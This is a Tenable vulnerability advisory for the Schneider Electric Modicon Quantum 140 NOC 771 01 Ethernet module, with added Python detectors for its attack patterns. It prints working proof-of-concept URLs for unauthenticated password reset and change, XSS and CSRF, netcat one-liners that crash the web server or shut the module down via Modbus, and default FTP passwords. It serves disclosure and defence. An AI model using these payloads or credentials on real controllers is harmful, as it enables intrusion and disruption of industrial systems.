
[R1] Multiple Schneider Electric Modicon Quantum Vulnerabilities

Critical

Synopsis

Tenable found multiple vulnerabilities in the Schneider Electric Quantum Modicon 140 NOC 771 01 Ethernet Module.

CVE-2018-7809: Unauthenticated Password Reset

An unauthenticated remote attacker can delete the existing username and password for the HTTP server by visiting the following URL:

http://[ip]/unsecure/embedded/builtin?submit=Delete%20Password

This also has the side effect of resetting the web server username and password to the default USER/USER.

CVE-2018-7810: Reflected XSS

A reflected XSS vulnerability exists in the HTTP server's /goform/formTest endpoint. A remote attacker can insert JavaScript into the name parameter, which is then executed in the browser of whoever follows the link. An example follows:

http://[ip]/goform/formTest?name=<script>alert()</script>

CVE-2018-7811: Unauthenticated Password Change

The web server allows an authenticated remote user to change their password via the /secure/embedded/builtin endpoint. It also lets an unauthenticated remote attacker change users' passwords via the /unsecure/embedded/builtin endpoint. An example URL that changes the admin user's password to evilpass follows:

http://[ip]/unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User

CVE-2018-7830: Unauthenticated Remote Denial of Service

A denial of service occurs when an unauthenticated remote attacker sends an HTTP request without the "\r\n\r\n" terminator. This renders the web server unusable for ~1 minute. The following is a one-line proof of concept:

echo -e "GET /index.htm HTTP/1.1\r\nHost: 192.168.248.30" | nc 192.168.248.30 80

CVE-2018-7831: Cross-site request forgery

The password change functionality is implemented with an HTTP GET request in which the new password is specified. An anti-forgery token is not required to validate the request. Furthermore, the current password does not need to be specified in order to complete a password change. An attacker can forge a link to be sent to an authenticated victim. Once clicked, the password will be changed. Example URL:

http://[ip]/secure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
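The four web-server issues above (password reset, password change, CSRF and reflected XSS) all ride on a handful of URL patterns, so a proxy or IDS log in front of the module can be checked for them. The following is an added detection example, not code from the advisory; it assumes common-log-format lines, and the log lines it scans are constructed samples.

```python
# Added example, not from the advisory: flag HTTP requests that match the
# management-endpoint abuse described for the 140 NOC 771 01 web server.
# Assumes common-log-format lines from a proxy or IDS in front of the module.
import re
from urllib.parse import urlsplit, parse_qs

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
XSS_RE = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)

def classify_request(method, target):
    """Return a label for a request matching one of the advisory's patterns, else None."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes %20 and '+'
    if parts.path == "/unsecure/embedded/builtin":
        if query.get("submit", [""])[0] == "Delete Password":
            return "unauth-password-reset (CVE-2018-7809)"
        if "passwd" in query:
            return "unauth-password-change (CVE-2018-7811)"
        return "unauth-management-endpoint"
    if parts.path == "/secure/embedded/builtin" and method == "GET" and "passwd" in query:
        return "password-change-over-GET (CVE-2018-7831)"
    if parts.path == "/goform/formTest" and XSS_RE.search(query.get("name", [""])[0]):
        return "reflected-xss-attempt (CVE-2018-7810)"
    return None

def scan_log(lines):
    """Return (client_ip, label, target) for each log line that matches."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, target, _status = m.groups()
        label = classify_request(method, target)
        if label:
            findings.append((client, label, target))
    return findings

# Constructed sample log lines (RFC 5737 test addresses)
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Aug/2018:10:01:02 +0000] "GET /unsecure/embedded/builtin?submit=Delete%20Password HTTP/1.1" 200 512',
    '203.0.113.7 - - [26/Aug/2018:10:01:09 +0000] "GET /unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User HTTP/1.1" 200 512',
    '198.51.100.4 - - [26/Aug/2018:10:02:30 +0000] "GET /secure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User HTTP/1.1" 200 512',
    '198.51.100.9 - - [26/Aug/2018:10:03:00 +0000] "GET /goform/formTest?name=%3Cscript%3Ealert()%3C/script%3E HTTP/1.1" 200 300',
    '192.0.2.10 - - [26/Aug/2018:10:04:00 +0000] "GET /index.htm HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, label, target in scan_log(SAMPLE_LOG):
        print(f"{client}\t{label}\t{target}")
```

Any hit on /unsecure/embedded/builtin is worth an alert on its own, since that path is reachable without credentials; the other labels narrow the finding to the specific advisory item.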

Others

Tenable reported seven vulnerabilities to Schneider Electric. Schneider indicated that one of them (default accounts) was a duplicate and another (Modbus denial of service) was not a vulnerability. However, we've decided to document them here.

Default FTP Accounts

We found a handful of default FTP accounts. Some of the passwords we used are VxHash collisions, a technique disclosed by H.D. Moore in 2010.

Username    Password
sysdiag     [email protected]
fdruser     ssresurdf
fwupgrade   FaAmU5p2F~
loki        ZfTljublsx

Modbus Denial of Service

Modbus is accessible over TCP port 502. Tenable found that the following unauthenticated remote Modbus message will completely shut down the Ethernet module:

echo -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0" | nc 192.168.238.30 502
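The bytes in that one-liner are a standard Modbus/TCP frame: a 7-byte MBAP header (transaction 0x00a8, protocol 0, length 5, unit 0) followed by function code 0x5a and three data bytes. The following added example, not code from the advisory, parses such frames as a TCP/502 monitor would and returns the reasons a frame should raise an alert; the allow-list and source addresses are constructed.

```python
# Added example, not from the advisory: parse a Modbus/TCP frame and flag the
# traits a monitor on TCP/502 should alert on. SHUTDOWN_FRAME holds the
# advisory's PoC bytes; the allow-list and source addresses are constructed.
import struct
from collections import namedtuple

ModbusFrame = namedtuple("ModbusFrame", "transaction protocol length unit function data")

# Public function codes from the Modbus application protocol spec; everything
# else is user-defined (65-72, 100-110) or reserved/vendor-specific.
PUBLIC_FUNCTIONS = {1, 2, 3, 4, 5, 6, 7, 8, 11, 12, 15, 16, 17, 20, 21, 22, 23, 24, 43}
USER_DEFINED = set(range(65, 73)) | set(range(100, 111))

def parse_modbus_tcp(frame):
    """Split the 7-byte MBAP header from the PDU; reject malformed frames."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    transaction, protocol, length, unit = struct.unpack(">HHHB", frame[:7])
    if protocol != 0:
        raise ValueError(f"unexpected protocol id {protocol}")
    if length != len(frame) - 6:
        raise ValueError(f"length field {length} does not match {len(frame) - 6} bytes")
    return ModbusFrame(transaction, protocol, length, unit, frame[7], frame[8:])

def assess(frame, src, allowed_sources):
    """Return the reasons a frame deserves an alert (empty list means benign)."""
    pdu = parse_modbus_tcp(frame)
    reasons = []
    if src not in allowed_sources:
        reasons.append(f"Modbus from non-allow-listed source {src}")
    if pdu.function not in PUBLIC_FUNCTIONS:
        kind = "user-defined" if pdu.function in USER_DEFINED else "non-public"
        reasons.append(f"{kind} function code 0x{pdu.function:02x}")
    if pdu.function == 0x5A:
        # 0x5a is the vendor-specific code the advisory's shutdown PoC uses
        reasons.append("vendor function 0x5a: matches 140 NOC 771 01 shutdown PoC")
    return reasons

# The 11 bytes from the advisory's netcat one-liner
SHUTDOWN_FRAME = bytes.fromhex("00a800000005005a000700")
# Constructed benign request: unit 1, function 1 (read coils), 10 coils from address 0
READ_COILS_FRAME = bytes.fromhex("00010000000601010000000a")

if __name__ == "__main__":
    allowed = {"192.168.238.10"}  # constructed engineering-workstation address
    for name, frame, src in [("read-coils", READ_COILS_FRAME, "192.168.238.10"),
                             ("shutdown", SHUTDOWN_FRAME, "192.168.238.99")]:
        print(name, assess(frame, src, allowed) or "ok")
```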

Solution

No patches for these vulnerabilities exist. However, in their advisory, Schneider Electric advises customers to follow their Modicon Controllers Platform Cyber Security Reference Manual. They also recommend customers configure access control lists and "protect Modicon products with network, industrial, and application firewalls."

Disclosure Timeline

08/26/2018 - 7 Issues Discovered
08/27/2018 - Schneider Electric informed by encrypted email. 90 day date is November 26, 2018.
08/30/2018 - Schneider informs Tenable that the disclosure has been forwarded internally. Schneider provides a new point of contact.
09/04/2018 - Tenable asks the new contact if they received the forwarded email.
09/07/2018 - Schneider confirms receipt and indicates the team is still assessing the disclosure.
09/20/2018 - Tenable asks for an update.
09/20/2018 - Schneider has no update yet.
09/26/2018 - Tenable asks for an update.
09/26/2018 - Schneider has no update yet.
09/28/2018 - Schneider confirms all vulnerabilities. However, the team hasn't confirmed if any of the vulnerabilities are duplicates yet.
10/12/2018 - Tenable asks for an update. Reminds Schneider that 45 days remain.
10/12/2018 - Schneider indicates they'll know more soon.
10/23/2018 - Tenable asks for an update.
10/24/2018 - Schneider confirms 5 new vulnerabilities. Flags one as a duplicate and one as not impacted.
10/24/2018 - Tenable asks Schneider to assign CVE.
10/24/2018 - Schneider acknowledges.
11/19/2018 - Tenable reminds Schneider of the upcoming disclosure date.
11/20/2018 - Schneider indicates they'll have the bulletin for Tenable to review shortly.
11/21/2018 - Schneider provides 5 CVEs.
11/23/2018 - Schneider releases their advisory.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.


If you have questions or corrections about this advisory, please email [email protected]
